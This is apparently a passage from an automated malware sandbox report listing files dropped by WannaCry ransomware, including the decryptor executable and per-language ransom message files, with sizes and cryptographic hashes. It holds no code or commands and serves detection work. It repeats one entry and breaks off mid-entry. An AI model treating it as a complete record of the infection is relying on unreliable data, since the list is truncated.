                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        12KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        06c634fb5874718d39c493eabd4db669

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        6f412282f2d78da0a31e9dd3d98ef8ac4ad81ffa

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        9af80377203fedd1ebb90f3b88fb03b3b1a82e72b461985e42af4d8863bebdc8

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        4a79da3f38f93cc721f3f07eb40cc9256273bf72f206fe1416a013a6d6ff47f4e8612b06f9995bdf3caf0795c63f9b66b404d88f5ec89730cc3ab2cf7e7c2931

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\UserCache.bin
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        37KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        38687f6e10d88b8a232070d6532644b1

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        afea71ee6c7fa4ca92fc8cffac43188ecc72c047

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        05179fdfffee7403d7886d259b317982ee695653dca53f7b092707bbe6003a20

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        41e3946c3ba4ccdfcb0b702c8eeac30f0acddded5659a5991b1cb417fbe8c4fd6dbd7f416e14c1d0625c8cd5f5495c12c8601222e5773a8bb9797f890c093585

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        24KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        b00f3f56c104c94e03cd2ad8452c14e7

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        51b78e45015e0d9d62fbdf31b75a22535a107204

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        ba2b669020334ff01a85bfc900ea4371ea557bd315f154875d9bdfdc16ae8b50

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        93e1609be5bbb414c285f37432ce93294c3d1583ef46c7c6c570c122f0b166c34b0ad87de708005c8af97dee27923ba53395a34c2563cdadf3c0a708848b3525

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\126341674245912.bat
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        340B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        3867f2ec82a7d77c9ffefb1aac8b7903

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        06fccf19b9c498b5afa2b35da00e3ab28d56f785

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        4e25c23aa5babc853889d3e1e79bb01ca7650837b250314a8d50f2e2c4b6730f

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        b413994e5b9f0ecb956055c7befff14845b56bb658fd8280d3213fdfa175ff76bc56e082174f2475fdf2d1f9eff618ebfd80ee2b67c091eaf1fd9c94697da5aa

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        240KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        7bf2b57f2a205768755c07f238fb32cc

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        681e8d673a061d415c3dcc9ff20418c6

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        d4dda35a7f8346cfb897689e0a529f8fb6124081

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        2b01ca73827c3c8e712e4038761bcc606eeeed0c51689797eb4657664ad0c362

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        cbc76171be3c8f91bdb61e09f840f4ea709dc1aa233f2f0bb2c14e89367d95c6d6f3334d576a4b930ae13648689726be07fcd2d876ea22ea753679e3dfb6596a

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\WindowsUpdate11.exe
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        3.4MB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        84c82835a5d21bbcf75a61706d8ab549

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\WindowsUpdate11.exe
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        3.4MB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        84c82835a5d21bbcf75a61706d8ab549

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\b.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1.4MB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        c17170262312f3be7027bc2ca825bf0c

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\c.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        780B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        93f33b83f1f263e2419006d6026e7bc1

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        1a4b36c56430a56af2e0ecabd754bf00067ce488

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\index.jpeg
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        7c8c7426746c0bc68ce7698050cd0efa

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        efd189652c87e4dda44f46f018cb834e6b90284a

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        879c301a5b9bd506294902daa36641907b9ae309577ed761eb2e6921c38b68ef

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        59c3af871e7e3690fca8952ce8731b2643a9f887b4e2165649f42b65577a3a1ba995350a99e31386f106e3e779163f6fe3f642733eb6be5490729a82328e1faa

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\m.vbs
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        219B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        82a1fc4089755cb0b5a498ffdd52f20f

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        0a8c0da8ef0354f37241e2901cf82ec9ce6474aa

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        7fbdc49f4b4ba21949eca0b16c534b4882da97e94e5ca131cec1629e60439dfa

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        1573a0c7333accef2695efefe1b57cba8f8d66a0061c24420ee0a183343a9a319995267d306ee85084c95580f9855bcdf9dee559b28a200b27fc3cc353315e78

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        46KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        95673b0f968c0f55b32204361940d184

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        53KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        0252d45ca21c8e43c9742285c48e91ad

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        5c14551d2736eef3a1c1970cc492206e531703c1

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        77KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        2efc3690d67cd073a9406a25005f7cea

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        52c07f98870eabace6ec370b7eb562751e8067e9

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        38KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        17194003fa70ce477326ce2f6deeb270

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        e325988f68d327743926ea317abb9882f347fa73

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        39KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        537efeecdfa94cc421e58fd82a58ba9e

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        3609456e16bc16ba447979f3aa69221290ec17d0

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        2c5a3b81d5c4715b7bea01033367fcb5

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        b548b45da8463e17199daafd34c23591f94e82cd

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        7a8d499407c6a647c03c4471a67eaad7

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        fe68c2dc0d2419b38f44d83f2fcf232e

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        6c6e49949957215aa2f3dfb72207d249adf36283

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        08b9e69b57e4c9b966664f8e1c27ab09

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        2da1025bbbfb3cd308070765fc0893a48e5a85fa

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        37KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        35c2f97eea8819b1caebd23fee732d8f

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        37KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        4e57113a6bf6b88fdd32782a4a381274

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        0fccbc91f0f94453d91670c6794f71348711061d

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        3d59bbb5553fe03a89f817819540f469

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        26781d4b06ff704800b463d0f1fca3afd923a9fe

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        47KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        fb4e8718fea95bb7479727fde80cb424

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        1088c7653cba385fe994e9ae34a6595898f20aeb

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        3788f91c694dfc48e12417ce93356b0f

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        30a200f78498990095b36f574b6e8690

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        c4b1b3c087bd12b063e98bca464cd05f3f7b7882

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        79KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        b77e1221f7ecd0b5d696cb66cda1609e

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        51eb7a254a33d05edf188ded653005dc82de8a46

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        89KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        6735cb43fe44832b061eeb3f5956b099

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        d636daf64d524f81367ea92fdafa3726c909bee1

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        40KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        c33afb4ecc04ee1bcc6975bea49abe40

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        fbea4f170507cde02b839527ef50b7ec74b4821f

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        ff70cc7c00951084175d12128ce02399

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        75ad3b1ad4fb14813882d88e952208c648f1fd18

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        38KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        e79d7f2833a9c2e2553c7fe04a1b63f4

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        37KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        fa948f7d8dfb21ceddd6794f2d56b44f

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        ca915fbe020caa88dd776d89632d7866f660fc7a

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        50KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        313e0ececd24f4fa1504118a11bc7986

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        46KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        452615db2336d60af7e2057481e4cab5

